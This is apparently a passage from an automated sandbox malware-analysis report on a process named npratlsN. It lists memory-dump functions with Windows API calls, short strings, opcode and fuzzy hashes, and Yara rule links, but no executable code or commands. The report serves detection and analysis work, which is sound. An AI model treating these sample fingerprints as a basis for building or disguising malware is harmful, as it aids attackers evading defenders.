Opcode ID: e7c030bd642dff978cfb84f3b4d398d7345aba031d288336644a95075069b82a
Instruction ID: ce546f681cbb01a4a48044941b20baef9d92a7301d1636fa54f557860d78655e
Opcode Fuzzy Hash: e7c030bd642dff978cfb84f3b4d398d7345aba031d288336644a95075069b82a
Instruction Fuzzy Hash: 50B1BD703042558FDB16BF388894AAE7BEAAFC9300F14856DE506CB2D5DB34DC45CB91

Function 1F905310 Relevance: 2.7, Strings: 2, Instructions: 234COMMON

Download Yara Rule

Strings

,wq, xrefs: 1F9053F0
,wq, xrefs: 1F9053E6

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: ,wq$,wq
API String ID: 0-1895925779
Opcode ID: 9fda6f9212d94283605fd19b6326179f39c5958c7f8b794c04e32bd9db4b727b
Instruction ID: 2c92394b723037f5f1b8d32cd3157890f362ba1529de223f539c36511f50a083
Opcode Fuzzy Hash: 9fda6f9212d94283605fd19b6326179f39c5958c7f8b794c04e32bd9db4b727b
Instruction Fuzzy Hash: 2B815B34A14605CFCB04FF69C88499AB7BAFFC9215B218169D5059B3A1EB31EC41CB91

Function 20A8D9B0 Relevance: 2.7, Strings: 2, Instructions: 230COMMON

Download Yara Rule

Strings

LRsq, xrefs: 20A8D9CC
LRsq, xrefs: 20A8DAF9

Memory Dump Source

Source File: 0000000D.00000002.3864442464.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a80000_npratlsN.jbxd

Similarity

API ID:
String ID: LRsq$LRsq
API String ID: 0-2113534932
Opcode ID: e383b373492eb76bccef434a2ed7184c79b0a312b19d45b9e040f8eb8acd14cd
Instruction ID: 244e606f08987242d4c42946f1c613127285baa039506a7de3b421695417b0e1
Opcode Fuzzy Hash: e383b373492eb76bccef434a2ed7184c79b0a312b19d45b9e040f8eb8acd14cd
Instruction Fuzzy Hash: E98190747101158FCB08DFB8C999A5E77B2FF89640B6285A9E505DB3A1EB30ED06CB90

Function 1F902F20 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xwq, xrefs: 1F902F56
Xwq, xrefs: 1F902F2D

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: Xwq$Xwq
API String ID: 0-2617233878
Opcode ID: c41cd6ef026c08f5f97dd08995fca429b1dd126a40947c2b224e0687e0ce31f1
Instruction ID: c48db3015470616ec044fffe0f59ad46beb3912ec1ee0974465073ff4b8b213e
Opcode Fuzzy Hash: c41cd6ef026c08f5f97dd08995fca429b1dd126a40947c2b224e0687e0ce31f1
Instruction Fuzzy Hash: FB31E472B0422A8BDB1D79B789D427EA6BEAF84380F14417DEA16C73C0EF749C458691

Function 1F907D88 Relevance: 2.6, Strings: 2, Instructions: 109COMMON

Download Yara Rule

Strings

$sq, xrefs: 1F907E44
$sq, xrefs: 1F907E67

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: $sq$$sq
API String ID: 0-1184984226
Opcode ID: 9f4994a7bdbb526e77e078a20d68d69c16d59b0bc1dba08a9774b42601c617b6
Instruction ID: a63e29d200015c194431b648b860c21e8eda53e0bd20a7ca391f8696743340d7
Opcode Fuzzy Hash: 9f4994a7bdbb526e77e078a20d68d69c16d59b0bc1dba08a9774b42601c617b6
Instruction Fuzzy Hash: 9E31D27130A142CFD717BB38D89466E777DAB84720B2105AED015CB2F2DA28EC808793

Function 1F908BE7 Relevance: 2.5, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

4'sq, xrefs: 1F908BFD
4'sq, xrefs: 1F908C14

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: 4'sq$4'sq
API String ID: 0-780347173
Opcode ID: 7e15290bbe5f2c0d6215f8417727aeb9c5bbb653dc9296750b280b688d083771
Instruction ID: 1dfec2b6a2ee741a300bf852d6573862812286b986e51ca22f774eb565addd1f
Opcode Fuzzy Hash: 7e15290bbe5f2c0d6215f8417727aeb9c5bbb653dc9296750b280b688d083771
Instruction Fuzzy Hash: A5F06D753045146BDB097665585097FBBEFEBCC661B104429FA09C73C1ED35DC0157A0

Function 1F900007 Relevance: 1.8, Strings: 1, Instructions: 565COMMON

Download Yara Rule

Strings

LRsq, xrefs: 1F9002C3

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: LRsq
API String ID: 0-3165563352
Opcode ID: 84027ccf0ce09d7f73e6721059ea60748f1809a0ce5705c6ee6c933baca4c499
Instruction ID: 28f101efe615067fd0607fb5690687333e53d7405fb84a06a359a400098efed9
Opcode Fuzzy Hash: 84027ccf0ce09d7f73e6721059ea60748f1809a0ce5705c6ee6c933baca4c499
Instruction Fuzzy Hash: E462E874A00269CFCB55DF64D9D4B8DBBB2FB4A341F1186A9D40AAB390DB306E81CF51

Function 1F900040 Relevance: 1.8, Strings: 1, Instructions: 541COMMON

Download Yara Rule

Strings

LRsq, xrefs: 1F9002C3

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: LRsq
API String ID: 0-3165563352
Opcode ID: 4e02dee067b54ebf97c19bc36846ce0d496eddf1baa767e7222e86934ed3bcb6
Instruction ID: 4cd413e605ac4edc989a5a5412ab845857d4da97c599899669764ae40b672549
Opcode Fuzzy Hash: 4e02dee067b54ebf97c19bc36846ce0d496eddf1baa767e7222e86934ed3bcb6
Instruction Fuzzy Hash: C052FA74A00269CFCB55DF64D9D4B8DBBB2FB49341F1186A9D80AAB390DB306E81CF51

Function 21294542 Relevance: 1.7, APIs: 1, Instructions: 229COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?), ref: 212947D2

Memory Dump Source

Source File: 0000000D.00000002.3865585011.0000000021290000.00000040.00000800.00020000.00000000.sdmp, Offset: 21290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_21290000_npratlsN.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 82a00a7dd2a3b709012d5ad4be703c8d84d95212a74f0c2daf5916d841eb0946
Instruction ID: e006f5676296f16d9ff524dc5473522a19628bf285ef32d2696bba39b3831a24
Opcode Fuzzy Hash: 82a00a7dd2a3b709012d5ad4be703c8d84d95212a74f0c2daf5916d841eb0946
Instruction Fuzzy Hash: EE9112B0A00B498FDB24CF69D980B9ABBF1BF49300F10892EE546E7B50D774E945CB94

Function 212968A4 Relevance: 1.7, APIs: 1, Instructions: 187COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 21296A71

Memory Dump Source

Source File: 0000000D.00000002.3865585011.0000000021290000.00000040.00000800.00020000.00000000.sdmp, Offset: 21290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_21290000_npratlsN.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: f3efb25a6e7eedb32307a3827c6c1c9b1cf828f03d4c5cae7f0242c54a55711e
Instruction ID: 66d3c2335973821b113d9178a8e2d67d76a2fd85758fd0937bc2d61641c3b514
Opcode Fuzzy Hash: f3efb25a6e7eedb32307a3827c6c1c9b1cf828f03d4c5cae7f0242c54a55711e
Instruction Fuzzy Hash: 87717CB4D00259DFDF21CFA9C980ADDBBF1BF4A310F2091AAE558A7211D7749985CF44

Function 212968B0 Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 21296A71

Memory Dump Source

Source File: 0000000D.00000002.3865585011.0000000021290000.00000040.00000800.00020000.00000000.sdmp, Offset: 21290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_21290000_npratlsN.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 7c06168964d514f22f404c17e4841f4108589ac35533c8f0cfcc7c71c5d679b8
Instruction ID: c929a5d7eff017d62065d8c4b876e968df820362956bd4c38083da819dbaa69c
Opcode Fuzzy Hash: 7c06168964d514f22f404c17e4841f4108589ac35533c8f0cfcc7c71c5d679b8
Instruction Fuzzy Hash: 34717BB4D00259DFDF20CFA9C980ADDBBF1BF09300F2091AAE918A7211D774AA85CF45

Function 20BEBAB0 Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 20BEBB83

Memory Dump Source

Source File: 0000000D.00000002.3864714448.0000000020BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20be0000_npratlsN.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ad20fe44c206f808cb9f7363be4f10b4a420da765906c02e3d89f23bb5c977e2
Instruction ID: 474338294550f1a28bc598335816d1f05fb3d9e51b503bcbc77658901140bb75
Opcode Fuzzy Hash: ad20fe44c206f808cb9f7363be4f10b4a420da765906c02e3d89f23bb5c977e2
Instruction Fuzzy Hash: 3E4177B9D002589FDB11CFA9D980ADEBBF5FF09310F24906AE918AB310D375A941DF94

Function 20BEBAB8 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 20BEBB83

Memory Dump Source

Source File: 0000000D.00000002.3864714448.0000000020BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20be0000_npratlsN.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 547970d9544d56ae640db506a259d277ab1bd8c101dac7414a4f854ce6995223
Instruction ID: 06f1b03f8f161ca2a62385198fd13b1a67317374e31c3f64087b6e85bfdef847
Opcode Fuzzy Hash: 547970d9544d56ae640db506a259d277ab1bd8c101dac7414a4f854ce6995223
Instruction Fuzzy Hash: CD4146B9D002589FCB10CFAAD984ADEBBF5FB09310F24906AE918AB310D375A945DF54

Function 21293C1C Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 21299261

Memory Dump Source

Source File: 0000000D.00000002.3865585011.0000000021290000.00000040.00000800.00020000.00000000.sdmp, Offset: 21290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_21290000_npratlsN.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: ebc414f7e0e50a3ab8416f1611c8ba8e066e352879a458a4686c35563b099a74
Instruction ID: 9d8871237a455af460bbc18a0e9afc363ce49b80fc4bbcaccc87e54e26762f08
Opcode Fuzzy Hash: ebc414f7e0e50a3ab8416f1611c8ba8e066e352879a458a4686c35563b099a74
Instruction Fuzzy Hash: B8414CB5D00205CFDB04CF99C884AAABBF5FF88324F25C499E518A7321D375A941CFA0

Function 1C87EEE8 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 1C87EF8C

Memory Dump Source

Source File: 0000000D.00000002.3849752503.000000001C870000.00000040.00000800.00020000.00000000.sdmp, Offset: 1C870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1c870000_npratlsN.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c9b978ff71ec14c7e11dfc9016cac47d226a21a687259aba218c6ec93aa3213c
Instruction ID: 2e1de042b9951fa23ed9818c559e2c0a5b8446a0b4cf1f95a068458642c743a2
Opcode Fuzzy Hash: c9b978ff71ec14c7e11dfc9016cac47d226a21a687259aba218c6ec93aa3213c
Instruction Fuzzy Hash: 353198B4D012489FCF10CFA9D980A9EFBB5AB49310F20942AE815B7210D775A945CF64

Function 21294740 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?), ref: 212947D2

Memory Dump Source

Source File: 0000000D.00000002.3865585011.0000000021290000.00000040.00000800.00020000.00000000.sdmp, Offset: 21290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_21290000_npratlsN.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 425a245ae4ce71c9aa295a17ab04a98153053e4173812e729e2b79363973107b
Instruction ID: 909424097317faaa78ce0e910b3efd9b5cc75ec885b0a8f78b4a95ed51bd0772
Opcode Fuzzy Hash: 425a245ae4ce71c9aa295a17ab04a98153053e4173812e729e2b79363973107b
Instruction Fuzzy Hash: EA31ACB4D002499FCB14CFA9D980ADEFBF5AF49310F24906AE918B7320D374A941CF64

Function 209C7E0C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 209C7F4E

Memory Dump Source

Source File: 0000000D.00000002.3863909598.00000000209C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209c0000_npratlsN.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6d11b3ea8a580708227025c1ba60763088c99319bbb28c1022dcf8a052f3ee29
Instruction ID: 8a69f50e01a42b069c1eb51fca5e4389ee68167664d1776b8df13e2f99394360
Opcode Fuzzy Hash: 6d11b3ea8a580708227025c1ba60763088c99319bbb28c1022dcf8a052f3ee29
Instruction Fuzzy Hash: 80114774E011198FDB04DBE8D484AADFBB5BB88314F209568E805A7342D735E981CB21

Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80

SysAllocString.OLEAUT32 ref: 00401898

Memory Dump Source

Source File: 0000000D.00000001.2243005056.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000001.2243005056.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000001.2243005056.000000000043F000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_1_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: AllocString_malloc
String ID:
API String ID: 959018026-0
Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA

Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 0000000D.00000001.2243005056.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000001.2243005056.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000001.2243005056.000000000043F000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_1_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Function 209D7547 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

(&sq, xrefs: 209D763B

Memory Dump Source

Source File: 0000000D.00000002.3863969597.00000000209D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209d0000_npratlsN.jbxd

Similarity

API ID:
String ID: (&sq
API String ID: 0-1527908608
Opcode ID: 7694a0a21a9eb6c5b7937edb233101dc19c075c27ccf335f797fc5e5f7f78bad
Instruction ID: 0aa18c462dac1b3b7e7e4ed665a873836bdf9a1eeaa53f2cc36a8c371e2a81b5
Opcode Fuzzy Hash: 7694a0a21a9eb6c5b7937edb233101dc19c075c27ccf335f797fc5e5f7f78bad
Instruction Fuzzy Hash: A8418331F006198BDB15DFA9C890ADEBBB2AF84710F508519D406BB394EF30AD46CB95

Function 1F909D80 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

(osq, xrefs: 1F909F09

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: (osq
API String ID: 0-609861455
Opcode ID: 3a08e3d5955e3f3b24f446e886c61df2ab347e008072bb893149591cf507b439
Instruction ID: dee5a1bc3225c6f05874549192be31c928a005aee9221197d40c61b7c51d15f0
Opcode Fuzzy Hash: 3a08e3d5955e3f3b24f446e886c61df2ab347e008072bb893149591cf507b439
Instruction Fuzzy Hash: 3D4114757042589FCB06AF79C894A9EBBBAFFC8710F244169E906DB381CE309C01C7A0

Function 1C87F1B8 Relevance: 1.3, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 1C87F236

Memory Dump Source

Source File: 0000000D.00000002.3849752503.000000001C870000.00000040.00000800.00020000.00000000.sdmp, Offset: 1C870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1c870000_npratlsN.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: bfd0de48bf4abd22e03c56358d9278d4e8d4d2181f547aac660d45918963a369
Instruction ID: 8027262806ea93702e84179a7baf3bae39a018dc216c659cbf948fa3106825cb
Opcode Fuzzy Hash: bfd0de48bf4abd22e03c56358d9278d4e8d4d2181f547aac660d45918963a369
Instruction Fuzzy Hash: A131ACB4D112189FCF10CFAAD981A9EFBF5AF49320F14942AE819B7310D775A901CF64

Function 1F90CB20 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37f0e2ef40f2e12453632ad3dbb9fccdede36275644dca2f33aa8a83fde8b18f
Instruction ID: 32d6386eadde20846dd48c80662c6cb76a44ed5f185d1afc2dcb0dc423b3d4d3
Opcode Fuzzy Hash: 37f0e2ef40f2e12453632ad3dbb9fccdede36275644dca2f33aa8a83fde8b18f
Instruction Fuzzy Hash: D51291B013222BCFC3597F20CAFD96ABA60FB1F333360AD44E50BC5055DB7604A99A25

Function 209D82DF Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863969597.00000000209D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209d0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 626b070b3b9bb20c3876ad6c81c3f1e8df432074556edbdc5294ac71f951ab3f
Instruction ID: ba02b410b9ce1852d5b3cf812dfd50ec6dd9ae9197d2591f9e853af7ca6a469f
Opcode Fuzzy Hash: 626b070b3b9bb20c3876ad6c81c3f1e8df432074556edbdc5294ac71f951ab3f
Instruction Fuzzy Hash: D9C1B075A012298FDB64DF68C994BDEBBB2BB49300F1085E9D50DA7390DB309E85CF61

Function 209D82E0 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863969597.00000000209D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209d0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3c05898bc8766ecffc5d7d2b8a4b293426fdc345ac3015559d2395125e82cef
Instruction ID: f41c904a6014e23d2f2c6fd857e092a967bffd2cf4077adf1d3b149eb8cd0d81
Opcode Fuzzy Hash: e3c05898bc8766ecffc5d7d2b8a4b293426fdc345ac3015559d2395125e82cef
Instruction Fuzzy Hash: CAC1B175A012298FDB64DF68C994BDEBBB2BB49300F1085E9D50DA7390DB309E85CF61

Function 1F906B60 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aa277c32455ea56a1e258badfebc98976e156dff552db63c8cdece0b1e0d35d
Instruction ID: 92e53e8ed1a9cdd23964ed57675bac38d1ecd9c3957f3f9e3c25e4e8df5b2fcd
Opcode Fuzzy Hash: 4aa277c32455ea56a1e258badfebc98976e156dff552db63c8cdece0b1e0d35d
Instruction Fuzzy Hash: 0F7119B4704255CFCB16EF28C894AA97BE9EF49754F2500AEE905CB3A1DB71EC41CB90

Function 209D8F10 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863969597.00000000209D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209d0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55ba6e6de1d3157b242d1814c3d08944bc39da841799b3167ee83e50259bff64
Instruction ID: 8b17cd4c8901458d48e580c033560f2bd257e5fe32678cdf27c70068d3f36d3b
Opcode Fuzzy Hash: 55ba6e6de1d3157b242d1814c3d08944bc39da841799b3167ee83e50259bff64
Instruction Fuzzy Hash: 4671D575E012199FCB04DFE9D895AEEBBF2BF89310F10842AD409BB354D7346946CBA4

Function 209D8030 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863969597.00000000209D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209d0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf01f1f55aed116ff7daabe00373761c959ce3544ff0d928a6538507652b840e
Instruction ID: 0869bb14bead537798cd057a53e71ce02f7e8cf66963a340e78b6fc5f3899e29
Opcode Fuzzy Hash: bf01f1f55aed116ff7daabe00373761c959ce3544ff0d928a6538507652b840e
Instruction Fuzzy Hash: A5610775E012189FDB04DFE9D950ADEBBF2BF88310F10D425E818AB755DA30A946CF54

Function 20A8C470 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864442464.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a80000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20a6a38f77cd02080c25b38410b6a6ff429e0a944503fbfd5455055cc704c508
Instruction ID: 9bbeaf47270ace6b9bdd15e72a815e478cfdc367ab168f7672c7319914d87aac
Opcode Fuzzy Hash: 20a6a38f77cd02080c25b38410b6a6ff429e0a944503fbfd5455055cc704c508
Instruction Fuzzy Hash: F171CF74E01218CFDB08DFE5C980BDDBBB2AF89340F209529D405AB394DB356942DF54

Function 20A86440 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864442464.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a80000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c969765558c580d1affd7bc710cb5a844efabfa167fa53081d79537c0fd52bf
Instruction ID: 651932ce83a202f3f47c4b75fcf8fa84a03a6cda3563ad5e6474d773285509a9
Opcode Fuzzy Hash: 8c969765558c580d1affd7bc710cb5a844efabfa167fa53081d79537c0fd52bf
Instruction Fuzzy Hash: 7971BF74E00218CFDB18DFE9C990BDDBBB2AF89341F209529D405AB394DB356942DF54

Function 20A8C760 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864442464.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a80000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 404111f8cc63f565e25046a19918d115768ded6d545783962d348f4ce709a388
Instruction ID: f3c4e5e53f43b6a8f8ed5ab728297a17f05e3f6a3aa0299ea900e23435c35d8b
Opcode Fuzzy Hash: 404111f8cc63f565e25046a19918d115768ded6d545783962d348f4ce709a388
Instruction Fuzzy Hash: 3E81B074E412688FDB65CF65CD91BDDBBB2BB89300F1084EAD849A7290DB715E81CF44

Function 20A70E98 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864345582.0000000020A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a70000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46d96f07eb2d564524b0979e852ccf53a2bd6116807e54ebded6cb75daf79cef
Instruction ID: 487c7b0e3cb90cf871c63baf376caff5462bd0dbfecce5cf282e50d524f863ee
Opcode Fuzzy Hash: 46d96f07eb2d564524b0979e852ccf53a2bd6116807e54ebded6cb75daf79cef
Instruction Fuzzy Hash: 0B71BF74E00218CFDB18DFE9C991BEDBBB2AF89340F209529D805AB394DB355986CF54

Function 20A76EC8 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864345582.0000000020A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a70000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cf10163248e79c17556e3638840eb8788f52f466f089a2cbd237afff73e6f26
Instruction ID: 9137157a8f65ba7b8dbcc22e5e621583adec1e94598b44df137630867c9b6a5a
Opcode Fuzzy Hash: 3cf10163248e79c17556e3638840eb8788f52f466f089a2cbd237afff73e6f26
Instruction Fuzzy Hash: F671AF74E00218CFDB18DFE5C990BEDBBB2AF89340F609529D405AB3A4DB355946CF54

Function 1F90E3A7 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfaa4cc628a33614a3af2b36befe86e074807be9fbd70174f4da93fa0b6c83a4
Instruction ID: 40b11beac71984acd6fc2e89f933a3741094170c82b5fdb7aa5e7757b9f0fb29
Opcode Fuzzy Hash: dfaa4cc628a33614a3af2b36befe86e074807be9fbd70174f4da93fa0b6c83a4
Instruction Fuzzy Hash: FC51E074D01218DFDB15EFE5C994AEDBBB2BF88301F208529E805AB294DB756985CF40

Function 1F9033F0 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
